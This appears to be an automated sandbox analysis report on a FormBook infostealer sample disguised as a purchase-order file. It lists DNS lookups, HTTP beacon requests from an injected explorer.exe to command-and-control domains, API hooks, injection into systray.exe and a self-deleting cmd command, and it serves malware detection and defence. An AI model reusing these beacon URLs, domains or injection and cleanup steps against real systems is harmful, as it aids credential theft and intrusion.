                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 8, 2021 13:20:54.496963978 CEST5062053192.168.2.38.8.8.8
                                            Apr 8, 2021 13:20:54.509605885 CEST53506208.8.8.8192.168.2.3
                                            Apr 8, 2021 13:20:55.236493111 CEST6493853192.168.2.38.8.8.8
                                            Apr 8, 2021 13:20:55.250818968 CEST53649388.8.8.8192.168.2.3
                                            Apr 8, 2021 13:20:56.199992895 CEST6015253192.168.2.38.8.8.8
                                            Apr 8, 2021 13:20:56.218528986 CEST53601528.8.8.8192.168.2.3
                                            Apr 8, 2021 13:20:56.716140032 CEST5754453192.168.2.38.8.8.8
                                            Apr 8, 2021 13:20:56.729211092 CEST53575448.8.8.8192.168.2.3
                                            Apr 8, 2021 13:20:57.332408905 CEST5598453192.168.2.38.8.8.8
                                            Apr 8, 2021 13:20:57.344840050 CEST53559848.8.8.8192.168.2.3
                                            Apr 8, 2021 13:20:58.054625988 CEST6418553192.168.2.38.8.8.8
                                            Apr 8, 2021 13:20:58.067919016 CEST53641858.8.8.8192.168.2.3
                                            Apr 8, 2021 13:20:58.800640106 CEST6511053192.168.2.38.8.8.8
                                            Apr 8, 2021 13:20:58.813636065 CEST53651108.8.8.8192.168.2.3
                                            Apr 8, 2021 13:20:59.689147949 CEST5836153192.168.2.38.8.8.8
                                            Apr 8, 2021 13:20:59.703089952 CEST53583618.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:00.481935024 CEST6349253192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:00.496642113 CEST53634928.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:01.968466043 CEST6083153192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:01.980351925 CEST53608318.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:03.163866997 CEST6010053192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:03.176206112 CEST53601008.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:03.881845951 CEST5319553192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:03.894516945 CEST53531958.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:05.055130005 CEST5014153192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:05.068723917 CEST53501418.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:10.986519098 CEST5302353192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:10.998456955 CEST53530238.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:11.804999113 CEST4956353192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:11.817593098 CEST53495638.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:12.718635082 CEST5135253192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:12.730581045 CEST53513528.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:13.877083063 CEST5934953192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:13.888834953 CEST53593498.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:19.788295984 CEST5708453192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:19.800942898 CEST53570848.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:28.345797062 CEST5882353192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:28.392071962 CEST53588238.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:32.088255882 CEST5756853192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:32.100229025 CEST53575688.8.8.8192.168.2.3
                                            Apr 8, 2021 13:21:48.955617905 CEST5054053192.168.2.38.8.8.8
                                            Apr 8, 2021 13:21:48.973728895 CEST53505408.8.8.8192.168.2.3
                                            Apr 8, 2021 13:22:02.479512930 CEST5436653192.168.2.38.8.8.8
                                            Apr 8, 2021 13:22:02.492809057 CEST53543668.8.8.8192.168.2.3
                                            Apr 8, 2021 13:22:12.222604990 CEST5303453192.168.2.38.8.8.8
                                            Apr 8, 2021 13:22:12.243179083 CEST53530348.8.8.8192.168.2.3
                                            Apr 8, 2021 13:22:15.785041094 CEST5776253192.168.2.38.8.8.8
                                            Apr 8, 2021 13:22:15.834970951 CEST53577628.8.8.8192.168.2.3
                                            Apr 8, 2021 13:22:19.175045013 CEST5543553192.168.2.38.8.8.8
                                            Apr 8, 2021 13:22:19.207401991 CEST53554358.8.8.8192.168.2.3
                                            Apr 8, 2021 13:22:36.422780991 CEST5071353192.168.2.38.8.8.8
                                            Apr 8, 2021 13:22:36.475877047 CEST53507138.8.8.8192.168.2.3
                                            Apr 8, 2021 13:22:42.826658964 CEST5613253192.168.2.38.8.8.8
                                            Apr 8, 2021 13:22:42.839353085 CEST53561328.8.8.8192.168.2.3
                                            Apr 8, 2021 13:22:45.008361101 CEST5898753192.168.2.38.8.8.8
                                            Apr 8, 2021 13:22:45.021218061 CEST53589878.8.8.8192.168.2.3
                                            Apr 8, 2021 13:22:56.757714033 CEST5657953192.168.2.38.8.8.8
                                            Apr 8, 2021 13:22:57.035116911 CEST53565798.8.8.8192.168.2.3
                                            Apr 8, 2021 13:23:15.656414032 CEST6063353192.168.2.38.8.8.8
                                            Apr 8, 2021 13:23:15.656864882 CEST6129253192.168.2.38.8.8.8
                                            Apr 8, 2021 13:23:15.675172091 CEST53606338.8.8.8192.168.2.3
                                            Apr 8, 2021 13:23:15.676373959 CEST53612928.8.8.8192.168.2.3
                                            Apr 8, 2021 13:23:18.321069002 CEST6361953192.168.2.38.8.8.8
                                            Apr 8, 2021 13:23:18.384574890 CEST53636198.8.8.8192.168.2.3

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Apr 8, 2021 13:22:15.785041094 CEST192.168.2.38.8.8.80xc3b8Standard query (0)www.mymoxypets.comA (IP address)IN (0x0001)
                                            Apr 8, 2021 13:22:36.422780991 CEST192.168.2.38.8.8.80xfb64Standard query (0)www.new123movies.proA (IP address)IN (0x0001)
                                            Apr 8, 2021 13:22:56.757714033 CEST192.168.2.38.8.8.80xdf55Standard query (0)www.talllensphotography.comA (IP address)IN (0x0001)
                                            Apr 8, 2021 13:23:18.321069002 CEST192.168.2.38.8.8.80x4e3dStandard query (0)www.turningtecc.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Apr 8, 2021 13:22:15.834970951 CEST8.8.8.8192.168.2.30xc3b8No error (0)www.mymoxypets.commymoxypets.bigcartel.comCNAME (Canonical name)IN (0x0001)
                                            Apr 8, 2021 13:22:15.834970951 CEST8.8.8.8192.168.2.30xc3b8No error (0)mymoxypets.bigcartel.comdualstack.sni.bigcartel.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                            Apr 8, 2021 13:22:15.834970951 CEST8.8.8.8192.168.2.30xc3b8No error (0)dualstack.sni.bigcartel.map.fastly.net151.101.1.211A (IP address)IN (0x0001)
                                            Apr 8, 2021 13:22:15.834970951 CEST8.8.8.8192.168.2.30xc3b8No error (0)dualstack.sni.bigcartel.map.fastly.net151.101.65.211A (IP address)IN (0x0001)
                                            Apr 8, 2021 13:22:15.834970951 CEST8.8.8.8192.168.2.30xc3b8No error (0)dualstack.sni.bigcartel.map.fastly.net151.101.129.211A (IP address)IN (0x0001)
                                            Apr 8, 2021 13:22:15.834970951 CEST8.8.8.8192.168.2.30xc3b8No error (0)dualstack.sni.bigcartel.map.fastly.net151.101.193.211A (IP address)IN (0x0001)
                                            Apr 8, 2021 13:22:36.475877047 CEST8.8.8.8192.168.2.30xfb64No error (0)www.new123movies.pro185.53.177.14A (IP address)IN (0x0001)
                                            Apr 8, 2021 13:22:57.035116911 CEST8.8.8.8192.168.2.30xdf55No error (0)www.talllensphotography.com50.118.194.26A (IP address)IN (0x0001)
                                            Apr 8, 2021 13:23:18.384574890 CEST8.8.8.8192.168.2.30x4e3dName error (3)www.turningtecc.comnonenoneA (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.mymoxypets.com
                                            • www.new123movies.pro
                                            • www.talllensphotography.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.349732151.101.1.21180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 8, 2021 13:22:15.858206034 CEST5025OUTGET /md5/?IBcTaR=Djxti6ShQzh8&DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3xA/G+A1ySyYzJdTo7KJPmykLVFLh3 HTTP/1.1
                                            Host: www.mymoxypets.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Apr 8, 2021 13:22:16.213646889 CEST5699INHTTP/1.1 301 Moved Permanently
                                            server: nginx/1.12.2
                                            content-type: text/html; charset=utf-8
                                            x-frame-options: SAMEORIGIN
                                            x-xss-protection: 1; mode=block
                                            x-content-type-options: nosniff
                                            x-download-options: noopen
                                            x-permitted-cross-domain-policies: none
                                            referrer-policy: strict-origin-when-cross-origin
                                            content-security-policy: frame-ancestors https://my.bigcartel.com;
                                            location: https://www.mymoxypets.com/md5?IBcTaR=Djxti6ShQzh8&DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3xA/G+A1ySyYzJdTo7KJPmykLVFLh3
                                            cache-control: no-cache
                                            x-request-id: 58afe355-13fe-4056-affc-cccda6fdf601
                                            x-runtime: 0.011333
                                            x-lifetime: 60/30
                                            Content-Length: 195
                                            Accept-Ranges: bytes
                                            Date: Thu, 08 Apr 2021 11:22:16 GMT
                                            Via: 1.1 varnish
                                            Age: 0
                                            Connection: close
                                            X-Served-By: cache-mxp6975-MXP
                                            X-Cache: MISS
                                            X-Cache-Hits: 0
                                            X-Timer: S1617880936.867442,VS0,VE340
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 79 6d 6f 78 79 70 65 74 73 2e 63 6f 6d 2f 6d 64 35 3f 49 42 63 54 61 52 3d 44 6a 78 74 69 36 53 68 51 7a 68 38 26 61 6d 70 3b 44 7a 72 4c 48 3d 4b 6d 52 6b 50 43 69 65 31 38 48 47 54 68 73 4b 6b 4a 48 71 4c 4b 4c 72 4b 66 56 44 55 59 4e 32 68 78 64 6c 36 2f 33 78 41 2f 47 2b 41 31 79 53 79 59 7a 4a 64 54 6f 37 4b 4a 50 6d 79 6b 4c 56 46 4c 68 33 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <html><body>You are being <a href="https://www.mymoxypets.com/md5?IBcTaR=Djxti6ShQzh8&amp;DzrLH=KmRkPCie18HGThsKkJHqLKLrKfVDUYN2hxdl6/3xA/G+A1ySyYzJdTo7KJPmykLVFLh3">redirected</a>.</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.349734185.53.177.1480C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 8, 2021 13:22:36.529474974 CEST6398OUTGET /md5/?DzrLH=dXMJ/yrosuk4D2OPjKCB839u/6tvM7QWLhghObYdXqbvabebVJQVkG1vpLTC6vFDwMgu&IBcTaR=Djxti6ShQzh8 HTTP/1.1
                                            Host: www.new123movies.pro
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Apr 8, 2021 13:22:36.553843975 CEST6399INHTTP/1.1 403 Forbidden
                                            Server: nginx
                                            Date: Thu, 08 Apr 2021 11:22:36 GMT
                                            Content-Type: text/html
                                            Content-Length: 146
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.34973750.118.194.2680C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 8, 2021 13:22:57.201416969 CEST6419OUTGET /md5/?IBcTaR=Djxti6ShQzh8&DzrLH=JP702FCblU1K1nbBBTKIcgs3vFjx7LTnku6fbfQ3JvhMEqeKMVIpxerk2LYg3Mu/rBkV HTTP/1.1
                                            Host: www.talllensphotography.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function NameHook TypeActive in Processes
                                            PeekMessageAINLINEexplorer.exe
                                            PeekMessageWINLINEexplorer.exe
                                            GetMessageWINLINEexplorer.exe
                                            GetMessageAINLINEexplorer.exe

                                            Processes

                                            Process: explorer.exe, Module: user32.dll
                                            Function NameHook TypeNew Data
                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEE
                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEE
                                            GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEE
                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEE

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:13:21:02
                                            Start date:08/04/2021
                                            Path:C:\Users\user\Desktop\PO#560.zip.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\PO#560.zip.exe'
                                            Imagebase:0xd60000
                                            File size:935424 bytes
                                            MD5 hash:225F5938273F006356FD813E46E3FCEF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.235177972.0000000004239000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:13:21:13
                                            Start date:08/04/2021
                                            Path:C:\Users\user\Desktop\PO#560.zip.exe
                                            Wow64 process (32bit):true
                                            Commandline:{path}
                                            Imagebase:0xca0000
                                            File size:935424 bytes
                                            MD5 hash:225F5938273F006356FD813E46E3FCEF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.279265822.0000000001420000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.278875737.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.279183925.00000000012E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:13:21:15
                                            Start date:08/04/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:
                                            Imagebase:0x7ff714890000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:13:21:31
                                            Start date:08/04/2021
                                            Path:C:\Windows\SysWOW64\systray.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\systray.exe
                                            Imagebase:0xc50000
                                            File size:9728 bytes
                                            MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.479474418.0000000000B60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.479196744.0000000000B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.478037976.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:13:21:36
                                            Start date:08/04/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\PO#560.zip.exe'
                                            Imagebase:0x1130000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:13:21:36
                                            Start date:08/04/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6b2800000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >